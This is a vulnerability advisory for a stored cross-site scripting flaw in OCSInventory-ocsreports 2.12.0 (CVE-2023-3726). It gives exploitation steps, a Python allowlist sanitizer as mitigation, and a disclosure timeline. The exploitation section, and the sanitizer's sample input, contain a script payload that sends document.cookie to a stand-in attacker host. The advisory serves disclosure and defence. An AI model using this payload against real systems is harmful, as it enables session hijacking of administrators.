OCSInventory 2.12.0 - Stored XSS
Summary
| Field | Value |
| --- | --- |
| Name | OCSInventory-ocsreports 2.12.0 - Stored cross-site Scripting |
| Code name | |
| Product | OCSInventory |
| Affected versions | Version 2.12.0 |
| State | Private |
| Release date | 2023-08-11 |
Vulnerability
| Field | Value |
| --- | --- |
| Kind | Stored cross-site Scripting |
| Rule | |
| Remote | Yes |
| CVSSv3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N |
| CVSSv3.1 Base Score | 4.9 |
| Exploit available | Yes |
| CVE ID(s) | CVE-2023-3726 |
Description
OCSInventory allows an e-mail template containing special characters to be stored, which leads to a stored cross-site scripting vulnerability.
Vulnerability
A cross-site scripting (XSS) vulnerability has been identified in OCSInventory-ocsreports, which could allow an attacker to steal sensitive data such as session cookies. It is also possible to steal the password hash if the attacker switches the server to debug mode, because the server displays the hash while in debug mode. This could be exploited if the target is an administrator with a current login session.
Exploitation
To exploit this vulnerability we need to go to the ocsreports portal -> Configuration -> Notification -> Customize Template and upload an HTML file with our payload:
<script> new Image().src="http://ourattacker-pc.com/?cookie="+document.cookie; </script>
Note that only administrators can make changes to the mail template.
Evidence of exploitation
Our security policy
We have reserved the ID CVE-2023-3726 to refer to this issue from now on.
System Information
- Version: OCSInventory-ocsreports v2.12.0
- Operating System: Linux
Mitigation
An updated version of OCSInventory-ocsreports is available at the vendor page.
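Updating removes the bug in this product, but the control that removes the bug class is allowlist sanitization of an uploaded template before it is stored or rendered: only layout and text markup survive, while script elements, inline event handlers and javascript: URLs are dropped and reported so the upload can be rejected and logged. The following Python script is an added example written for this advisory, not OCSInventory's own code; the tag and attribute allowlist, the function names and the sample input are assumptions chosen for illustration, and the sample reuses the payload quoted above.

```python
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allowlist for an e-mail template: layout and text markup only. These sets
# are assumptions for this example, not OCSInventory's own configuration.
ALLOWED_TAGS = {
    "p", "br", "b", "i", "u", "strong", "em", "span", "div",
    "h1", "h2", "h3", "h4", "table", "thead", "tbody", "tr", "td", "th",
    "ul", "ol", "li", "a",
}
VOID_TAGS = {"br"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "td": {"colspan"}, "th": {"colspan"}}
SAFE_SCHEMES = {"http", "https", "mailto"}
# Elements whose entire content is discarded, not just the tag itself.
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed"}


def _safe_url(value):
    """Accept only absolute URLs with an allowlisted scheme.

    Whitespace and control characters are stripped first so that
    'java\\nscript:' cannot slip past the scheme check.
    """
    cleaned = re.sub(r"[\s\x00-\x1f]", "", value or "")
    return urlparse(cleaned).scheme.lower() in SAFE_SCHEMES


class TemplateSanitizer(HTMLParser):
    """Rebuilds the template from an allowlist and records what was removed."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []         # sanitized fragments, joined at the end
        self.dropped = []     # audit trail of removed markup
        self._skip_depth = 0  # > 0 while inside a dropped element

    def handle_starttag(self, tag, attrs):
        if self._skip_depth:
            if tag in DROP_CONTENT_TAGS:
                self._skip_depth += 1
            return
        if tag in DROP_CONTENT_TAGS:
            self._skip_depth = 1
            self.dropped.append(f"<{tag}> element and its content removed")
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(f"<{tag}> tag stripped")
            return
        kept = []
        for name, value in attrs:  # HTMLParser already lowercases names
            if name.startswith("on"):
                self.dropped.append(f"event handler {name} on <{tag}> removed")
            elif name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"attribute {name} on <{tag}> removed")
            elif name == "href" and not _safe_url(value):
                self.dropped.append(f"unsafe href on <{tag}> removed")
            else:
                kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self._skip_depth:
            if tag in DROP_CONTENT_TAGS:
                self._skip_depth -= 1
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Re-escape text so entities decoded by the parser cannot reintroduce markup.
        if not self._skip_depth:
            self.out.append(escape(data, quote=False))

    def handle_comment(self, data):
        pass  # comments are dropped; conditional comments can hide markup


def sanitize_template(html):
    """Return (sanitized_html, dropped) for an uploaded template body."""
    parser = TemplateSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.dropped


if __name__ == "__main__":
    # Constructed sample: legitimate markup mixed with the advisory's payload.
    sample = (
        '<p onmouseover="steal()">Hello <b>admin</b></p>'
        '<script> new Image().src="http://ourattacker-pc.com/?cookie="+document.cookie; </script>'
        '<a href="javascript:alert(1)">link</a>'
    )
    clean, dropped = sanitize_template(sample)
    print(clean)
    for reason in dropped:
        print("rejected:", reason)
```

Because the sanitizer returns the list of removed constructs, an upload handler can refuse the file and log the attempt whenever that list is non-empty, which is the behaviour a template editor restricted to administrators should have, rather than silently storing a cleaned copy.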
Credits
The vulnerability was discovered by Ronald Hernandez from Fluid Attacks' Offensive Team.
References
Vendor page https://ocsinventory-ng.org/
Timeline
| Date | Event |
| --- | --- |
| 2023-07-17 | Vulnerability discovered. |
| 2023-07-17 | Vendor contacted. |
| 2023-07-20 | Vendor replied acknowledging the report. |
| 2023-07-20 | Vendor confirmed the vulnerability. |
| 2023-08-11 | Vulnerability patched. |
| 2023-08-11 | Public disclosure. |